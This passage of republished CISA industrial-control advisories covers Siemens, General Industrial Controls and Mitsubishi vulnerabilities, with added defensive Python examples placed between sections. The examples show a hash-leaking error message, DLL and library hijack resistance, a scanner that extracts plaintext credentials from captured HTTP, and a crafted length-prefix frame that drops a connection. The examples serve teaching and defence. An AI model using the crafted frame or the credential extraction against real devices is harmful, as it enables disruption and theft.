A CVSS v4 score has also been calculated for CVE-2024-22019. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Rockwell Automation reported this vulnerability to CISA.

4. MITIGATIONS

Rockwell Automation reports this issue is corrected in software Version 6.60.00 and later.

For more information about this issue, see the advisory on the Rockwell Automation security page.

Users of the affected software who are unable to upgrade to one of the corrected versions should follow Rockwell Automation security best practices.

If you have any questions regarding the security issue above and how to mitigate it, contact TechConnect for assistance. More information can be found at Contact Us | Rockwell Automation | US.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of Rockwell Automation advisory

Siemens Altair Grid Engine

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v3 7.8
  • ATTENTION: Low attack complexity
  • Vendor: Siemens
  • Equipment: Altair Grid Engine
  • Vulnerabilities: Generation of Error Message Containing Sensitive Information, Uncontrolled Search Path Element

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to escalate privileges and execute arbitrary code with superuser permissions.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Altair Grid Engine are affected:

  • Altair Grid Engine: All versions prior to V2026.0.0

3.2 VULNERABILITY OVERVIEW

3.2.1 GENERATION OF ERROR MESSAGE CONTAINING SENSITIVE INFORMATION CWE-209

Affected products do not properly handle error messages and disclose sensitive password hash information when processing user authentication requests. This could allow a local attacker to extract password hashes for privileged accounts, which can then be subjected to offline brute-force attacks.
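The error-message disclosure described above, as an added example that is not Altair or Siemens code: an authentication routine whose failure diagnostic carries the stored record, beside one that returns a single generic message and scrubs digest-like tokens from what it logs. The user store, hash parameters and message formats are assumptions.

```python
"""Authentication error handling that never exposes stored credential material
to the caller (CWE-209).

Added example, not Altair or Siemens code; the user store, hash parameters and
message formats are assumptions.
"""
import hashlib
import hmac
import re


def derive(password, salt_hex, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt_hex), iterations).hex()


# Constructed user store holding a salted hash of a constructed passphrase.
USER_STORE = {
    "svc-batch": {"salt": "00112233445566778899aabbccddeeff",
                  "hash": derive("constructed-pw", "00112233445566778899aabbccddeeff")},
}


class AuthError(Exception):
    pass


def authenticate_vulnerable(username, password):
    """The disclosure pattern: the diagnostic attached to the failure carries
    the stored record, so whoever can see the error sees the hash."""
    rec = USER_STORE.get(username)
    if rec is None:
        raise AuthError(f"unknown user {username}")
    if derive(password, rec["salt"]) != rec["hash"]:
        raise AuthError(f"password mismatch for {username}: stored={rec}")
    return True


HASH_TOKEN = re.compile(r"\b[0-9a-f]{32,}\b")


def redact(message):
    """Scrub anything that looks like a hex digest before it reaches a log."""
    return HASH_TOKEN.sub("[REDACTED]", message)


def authenticate_hardened(username, password, server_log):
    rec = USER_STORE.get(username)
    # Same work on the unknown-user path so timing does not reveal account names.
    salt = rec["salt"] if rec else "00" * 16
    expected = rec["hash"] if rec else "00" * 32
    ok = hmac.compare_digest(derive(password, salt), expected) and rec is not None
    if not ok:
        # Detail stays server-side, and even there the digest is scrubbed.
        server_log.append(redact(f"auth failure user={username} record={rec}"))
        raise AuthError("authentication failed")  # one generic message for every cause
    return True
```

The redaction step matters even for server-side logs on a multi-user cluster: the advisory's attacker is local, and a log file readable by ordinary users would leak the same hashes the error message did.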

CVE-2025-40760 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.5 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

3.2.2 UNCONTROLLED SEARCH PATH ELEMENT CWE-427

Affected products do not properly validate environment variables when loading shared libraries, allowing path hijacking through malicious library substitution. This could allow a local attacker to execute arbitrary code with superuser privileges by manipulating the environment variable and placing a malicious library in the controlled path.

CVE-2025-40763 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Daniele Montanaro reported these vulnerabilities to Siemens. Siemens ProductCERT reported these vulnerabilities to CISA.

4. MITIGATIONS

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

  • Update to V2026.0.0 or later version.
  • CVE-2025-40760: For clusters not using the UGERest API/daemon, remove the setuid-root bit from the binaries for all architectures: chmod u-s $SGE_ROOT/utilbin//authuser.
  • CVE-2025-40763: For non-Windows clusters, remove the setuid-root bit from the “sgepasswd” binary for all installed architectures: chmod u-s $SGE_ROOT/bin//sgepasswd.

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.

Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage.

For more information see the associated Siemens security advisory SSA-514895 in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of Siemens SSA-514895

Siemens Software Center and Solid Edge

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 8.5
  • ATTENTION: Low attack complexity
  • Vendor: Siemens
  • Equipment: Software Center and Solid Edge
  • Vulnerability: Uncontrolled Search Path Element

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code via placing a crafted DLL file on the system.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Siemens Software Center and Solid Edge are affected:

  • Siemens Software Center: All versions prior to 3.5
  • Solid Edge SE2025: All versions prior to V225.0 Update 10

3.2 VULNERABILITY OVERVIEW

3.2.1 UNCONTROLLED SEARCH PATH ELEMENT CWE-427

The affected application is vulnerable to DLL hijacking. This could allow an attacker to execute arbitrary code via placing a crafted DLL file on the system.
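Both CWE-427 findings on this page, the environment-variable library hijack in Altair Grid Engine (3.2.2 of the previous advisory) and the DLL hijack above, come down to a loader honouring a search path that an unprivileged user can influence. The following is one added example for both, not Siemens, Altair or Solid Edge code: a library resolver that consults trusted roots first, ignores caller-supplied search-path variables entirely when running privileged, and refuses to load a library found in a directory that is not root-owned and non-writable; it also carries the setuid-bit check behind the chmod u-s mitigation in the Altair advisory. The trusted roots, variable names and library names are assumptions, and filesystem access is injectable so the logic can be exercised against a constructed layout.

```python
"""Resolve a shared library or DLL only from trusted, non-writable directories,
ignoring caller-supplied search-path variables when running with elevated
privileges (CWE-427).

Added example, not Siemens, Altair or Solid Edge code; the trusted roots,
variable names and library names are assumptions. Filesystem access is
injectable so the logic can be exercised against a constructed layout.
"""
import collections
import os
import stat

StatInfo = collections.namedtuple("StatInfo", "st_mode st_uid")

TRUSTED_ROOTS = ("/usr/lib", "/opt/vendor/lib")  # assumed; on Windows the
                                                  # equivalents are System32 and
                                                  # the application directory
SEARCH_PATH_VARS = ("LD_LIBRARY_PATH", "PATH")    # caller-controlled, untrusted


def running_privileged():
    """True for root or for a setuid process (effective uid != real uid)."""
    if hasattr(os, "geteuid"):
        return os.geteuid() == 0 or os.geteuid() != os.getuid()
    return False


def has_setuid_bit(st_mode):
    """The advisory's interim mitigation removes this bit (chmod u-s)."""
    return bool(st_mode & stat.S_ISUID)


def candidate_dirs(env, trusted_roots, privileged):
    """Trusted roots first; environment-supplied directories only when not
    privileged, since a setuid program must not let its caller steer loading."""
    dirs = list(trusted_roots)
    if not privileged:
        for var in SEARCH_PATH_VARS:
            dirs += [d for d in env.get(var, "").split(os.pathsep) if d]
    return dirs


def dir_is_trustworthy(path, statfn=os.stat):
    """Existing directory, owned by uid 0, not writable by group or others."""
    try:
        st = statfn(path)
    except OSError:
        return False
    if not stat.S_ISDIR(st.st_mode) or st.st_uid != 0:
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def locate_library(name, env, trusted_roots=TRUSTED_ROOTS, privileged=None,
                   exists=os.path.exists, statfn=os.stat):
    if privileged is None:
        privileged = running_privileged()
    for d in candidate_dirs(env, trusted_roots, privileged):
        full = os.path.join(d, name)
        if not exists(full):
            continue
        if d in trusted_roots or dir_is_trustworthy(d, statfn):
            return full
        # A copy of the library sitting in a writable directory on the search
        # path is exactly the hijacking condition: refuse, do not fall through.
        raise PermissionError(f"refusing to load {full}: untrusted directory")
    raise FileNotFoundError(name)


if __name__ == "__main__":
    layout = {"/usr/lib/libauth.so", "/tmp/stage/libauth.so"}
    env = {"LD_LIBRARY_PATH": "/tmp/stage"}
    print(locate_library("libauth.so", env, ("/usr/lib",), True, exists=lambda p: p in layout))
```

The order of the two rules is the point: a privileged process never even lists the caller's directories, and an unprivileged one that does list them still refuses a writable directory outright rather than quietly preferring it.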

CVE-2025-40827 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-40827. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Sahil Shah from National Forensic Sciences University reported this vulnerability to Siemens.

4. MITIGATIONS

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.

Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage.

For more information see the associated Siemens security advisory SSA-365596 in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of Siemens SSA-365596

General Industrial Controls Lynx+ Gateway

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 9.2
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: General Industrial Controls
  • Equipment: Lynx+ Gateway
  • Vulnerabilities: Weak Password Requirements, Missing Authentication for Critical Function, Cleartext Transmission of Sensitive Information

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to obtain sensitive device information, gain unauthorized access, or create a denial-of-service condition.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Lynx+ Gateway are affected:

  • Lynx+ Gateway: Version R08
  • Lynx+ Gateway: Version V03
  • Lynx+ Gateway: Version V05
  • Lynx+ Gateway: Version V18

3.2 VULNERABILITY OVERVIEW

3.2.1 WEAK PASSWORD REQUIREMENTS CWE-521

The affected product enforces weak password requirements, which may allow an attacker to brute-force credentials and gain unauthorized access to the device.

CVE-2025-55034 has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2025-55034. A base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N).

3.2.2 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306

The embedded web server does not require authentication for a critical function, which could allow a remote attacker to reset the device.

CVE-2025-58083 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-58083. A base score of 9.2 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:H).

3.2.3 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306

The embedded web server does not require authentication for a critical function, which could allow a remote attacker to obtain sensitive device information by sending unauthenticated GET requests.

CVE-2025-59780 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-59780. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.2.4 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319

The affected product transmits sensitive information in cleartext, which could allow an attacker who can observe network traffic to obtain sensitive information, including plaintext credentials.

CVE-2025-62765 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-62765. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
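
Because the device sends credentials in the clear (3.2.4), whatever a passive observer on the same network segment captures is directly readable. The following Python is added here as an illustration; it is not part of the GIC product or of this advisory. It runs the triage a responder would run over captured HTTP requests: decode HTTP Basic authorization headers and pull password-like fields out of form posts. The three requests, the 192.0.2.10 address, the /login.cgi path and the field names are constructed sample data, not traffic observed from a Lynx+ Gateway.

```python
"""Flag plaintext credentials in captured HTTP requests (CWE-319 triage)."""
import base64
import re
from urllib.parse import parse_qs

# Constructed sample capture: host, paths and field names are assumptions for
# the example, not traffic observed from a Lynx+ Gateway.
CAPTURED_REQUESTS = [
    "GET /status HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n",
    "POST /login.cgi HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=operator&pwd=Summer2025",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
]

# Field names commonly used for secrets and for the account name in login forms.
SECRET_FIELD = re.compile(r"^(pass|passwd|pwd|password|secret|token|pin)$", re.I)
USER_FIELD = re.compile(r"^(user|username|login|uid)$", re.I)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_cleartext_credentials(raw):
    """Return [(kind, username, secret), ...] for one request.

    kind is 'basic-auth' for an Authorization: Basic header and 'form-field'
    for a password-like field in a urlencoded POST body.
    """
    findings = []
    _, headers, body = parse_request(raw)

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("utf-8")
            user, _, secret = decoded.partition(":")
            findings.append(("basic-auth", user, secret))
        except (ValueError, UnicodeDecodeError):
            findings.append(("basic-auth", "<undecodable>", ""))

    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and body:
        fields = parse_qs(body, keep_blank_values=True)
        user = next((v[0] for k, v in fields.items() if USER_FIELD.match(k)), "")
        for key, values in fields.items():
            if SECRET_FIELD.match(key):
                findings.append(("form-field", user, values[0]))
    return findings


def scan_capture(requests):
    """Map request index -> findings, only for requests that leak something."""
    report = {}
    for index, raw in enumerate(requests):
        findings = find_cleartext_credentials(raw)
        if findings:
            report[index] = findings
    return report


if __name__ == "__main__":
    for index, findings in scan_capture(CAPTURED_REQUESTS).items():
        for kind, user, secret in findings:
            print(f"request {index}: {kind} user={user!r} secret={secret!r}")
```

HTTP Basic is only an encoding, not encryption, so the first request hands over "admin:admin" to anyone on the path; the form post does the same with no encoding at all. The check is also useful after a fix: if the device is moved behind TLS or a VPN, a capture on the OT segment should yield no findings.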

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: India

3.4 RESEARCHER

Abhishek Pandey from Payatu Security Consulting Pvt. Ltd. reported these vulnerabilities to CISA.

4. MITIGATIONS

General Industrial Controls (GIC) did not respond to CISA’s attempts to coordinate. Users of General Industrial Controls Lynx+ Gateway are encouraged to reach out to GIC for more information.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • November 13, 2025: Initial Publication

Mitsubishi Electric MELSEC iQ-F Series

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v3 5.3
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Mitsubishi Electric
  • Equipment: MELSEC iQ-F Series
  • Vulnerability: Improper Validation of Specified Quantity in Input

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition on the product.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Mitsubishi Electric MELSEC iQ-F Series are affected:

  • FX5U-32MT/ES: All versions
  • FX5U-32MT/DS: All versions
  • FX5U-32MT/ESS: All versions
  • FX5U-32MT/DSS: All versions
  • FX5U-64MT/ES: All versions
  • FX5U-64MT/DS: All versions
  • FX5U-64MT/ESS: All versions
  • FX5U-64MT/DSS: All versions
  • FX5U-80MT/ES: All versions
  • FX5U-80MT/DS: All versions
  • FX5U-80MT/ESS: All versions
  • FX5U-80MT/DSS: All versions
  • FX5U-32MR/ES: All versions
  • FX5U-32MR/DS: All versions
  • FX5U-64MR/ES: All versions
  • FX5U-64MR/DS: All versions
  • FX5U-80MR/ES: All versions
  • FX5U-80MR/DS: All versions
  • FX5UC-32MT/D: All versions
  • FX5UC-32MT/DSS: All versions
  • FX5UC-64MT/D: All versions
  • FX5UC-64MT/DSS: All versions
  • FX5UC-96MT/D: All versions
  • FX5UC-96MT/DSS: All versions
  • FX5UC-32MT/DS-TS: All versions
  • FX5UC-32MT/DSS-TS: All versions
  • FX5UC-32MR/DS-TS: All versions
  • FX5UJ-24MT/ES: All versions
  • FX5UJ-24MT/DS: All versions
  • FX5UJ-24MT/ESS: All versions
  • FX5UJ-24MT/DSS: All versions
  • FX5UJ-40MT/ES: All versions
  • FX5UJ-40MT/DS: All versions
  • FX5UJ-40MT/ESS: All versions
  • FX5UJ-40MT/DSS: All versions
  • FX5UJ-60MT/ES: All versions
  • FX5UJ-60MT/DS: All versions
  • FX5UJ-60MT/ESS: All versions
  • FX5UJ-60MT/DSS: All versions
  • FX5UJ-24MR/ES: All versions
  • FX5UJ-24MR/DS: All versions
  • FX5UJ-40MR/ES: All versions
  • FX5UJ-40MR/DS: All versions
  • FX5UJ-60MR/ES: All versions
  • FX5UJ-60MR/DS: All versions
  • FX5UJ-24MR/ES-A: All versions
  • FX5UJ-24MT/ES-A: All versions
  • FX5UJ-40MR/ES-A: All versions
  • FX5UJ-40MT/ES-A: All versions
  • FX5UJ-60MR/ES-A: All versions
  • FX5UJ-60MT/ES-A: All versions
  • FX5S-30MT/ES: All versions
  • FX5S-30MT/DS: All versions
  • FX5S-30MT/ESS: All versions
  • FX5S-30MT/DSS: All versions
  • FX5S-40MT/ES: All versions
  • FX5S-40MT/DS: All versions
  • FX5S-40MT/ESS: All versions
  • FX5S-40MT/DSS: All versions
  • FX5S-60MT/ES: All versions
  • FX5S-60MT/DS: All versions
  • FX5S-60MT/ESS: All versions
  • FX5S-60MT/DSS: All versions
  • FX5S-80MT/ES: All versions
  • FX5S-80MT/DS: All versions
  • FX5S-80MT/ESS: All versions
  • FX5S-80MT/DSS: All versions
  • FX5S-30MR/ES: All versions
  • FX5S-30MR/DS: All versions
  • FX5S-40MR/ES: All versions
  • FX5S-40MR/DS: All versions
  • FX5S-60MR/ES: All versions
  • FX5S-60MR/DS: All versions
  • FX5S-80MR/ES: All versions
  • FX5S-80MR/DS: All versions
  • FX5S-30MR/ES-A: All versions
  • FX5S-30MT/ES-A: All versions
  • FX5S-40MR/ES-A: All versions
  • FX5S-40MT/ES-A: All versions
  • FX5S-60MR/ES-A: All versions
  • FX5S-60MT/ES-A: All versions
  • FX5S-80MR/ES-A: All versions
  • FX5S-80MT/ES-A: All versions

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER VALIDATION OF SPECIFIED QUANTITY IN INPUT CWE-1284

A denial-of-service (DoS) vulnerability exists in the TCP communication function of the MELSEC iQ-F Series CPU module. A remote attacker may be able to terminate a TCP connection by sending specially crafted TCP packets, causing a denial-of-service condition on the affected products (CVE-2025-10259). Connections other than the attacked one are not affected.

CVE-2025-10259 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
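
The advisory does not disclose which field or message is affected, so the following Python is a generic illustration of the weakness class (CWE-1284, a quantity taken from the input and used without validation) rather than of the MELSEC protocol. It is added code, not Mitsubishi Electric's. It places a length-prefixed framing layer that trusts the declared payload length next to one that validates it, and a minimal connection loop that shows why an unexpected parser error costs only the attacked connection, matching the "no impact on other connections" statement above. The 2-byte header, the 4096-byte limit and the crafted frame are assumptions made for the example.

```python
"""CWE-1284 illustration: a length-prefixed TCP framing layer, trusting vs. validating."""
import struct

HEADER = struct.Struct("!H")  # assumed 2-byte big-endian declared payload length
MAX_PAYLOAD = 4096            # assumed application limit for this toy protocol


class FrameError(Exception):
    """Recoverable protocol error: the frame is rejected, the connection survives."""


def parse_frame_trusting(buf):
    """Weak parser: uses the declared length without checking it against the
    bytes actually received or against any upper bound."""
    (declared,) = HEADER.unpack_from(buf, 0)
    payload = buf[HEADER.size:HEADER.size + declared]
    if len(payload) != declared:
        # Surfaces as an unexpected error (or, in a socket server, a read that
        # never completes), not as a protocol-level rejection.
        raise RuntimeError(f"short read: wanted {declared}, got {len(payload)}")
    return payload


def parse_frame_checked(buf):
    """Hardened parser: the declared quantity is validated before it is used."""
    if len(buf) < HEADER.size:
        raise FrameError("header too short")
    (declared,) = HEADER.unpack_from(buf, 0)
    if declared > MAX_PAYLOAD:
        raise FrameError(f"declared length {declared} exceeds limit {MAX_PAYLOAD}")
    available = len(buf) - HEADER.size
    if available < declared:
        raise FrameError(f"declared {declared} bytes, only {available} present")
    return buf[HEADER.size:HEADER.size + declared]


def serve_connection(parse, frames):
    """Minimal per-connection loop. FrameError is handled per frame; any other
    exception is treated the way most servers treat it: close this connection.
    Returns (frames_accepted, connection_still_open)."""
    accepted = 0
    for frame in frames:
        try:
            parse(frame)
            accepted += 1
        except FrameError:
            continue                 # drop the bad frame, keep serving
        except Exception:
            return accepted, False   # only this connection is lost
    return accepted, True


GOOD_FRAME = HEADER.pack(5) + b"hello"
# Constructed crafted frame: declares 65535 payload bytes but carries two.
CRAFTED_FRAME = HEADER.pack(0xFFFF) + b"xx"
SESSION = [GOOD_FRAME, CRAFTED_FRAME, GOOD_FRAME]

if __name__ == "__main__":
    print("trusting parser:", serve_connection(parse_frame_trusting, SESSION))
    print("checked parser: ", serve_connection(parse_frame_checked, SESSION))
```

With the trusting parser the crafted frame ends the session after one good frame; with the checked parser it is rejected and the third frame is still served. The two validation steps are the point: the declared quantity must be bounded by what the application can accept and by what has actually arrived.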

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Japan

3.4 RESEARCHER

Qian Zou, Ke Xu, Xuewei Feng, Qi Li, Xueying Li, and Gang Jin from Zhongguancun Laboratory and Tsinghua University reported this vulnerability to Mitsubishi Electric.

4. MITIGATIONS

Mitsubishi Electric recommends that users take the following mitigation measures to minimize the risk of this vulnerability being exploited:

  • Use a virtual private network (VPN) to encrypt the communication when Internet access is required.
  • Restrict physical access to the affected products and to the LAN to which they are connected.

For more information, see Mitsubishi Electric Advisory 2025-014.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of Mitsubishi Electric Advisory 2025-014

AVEVA Edge

View CSAF

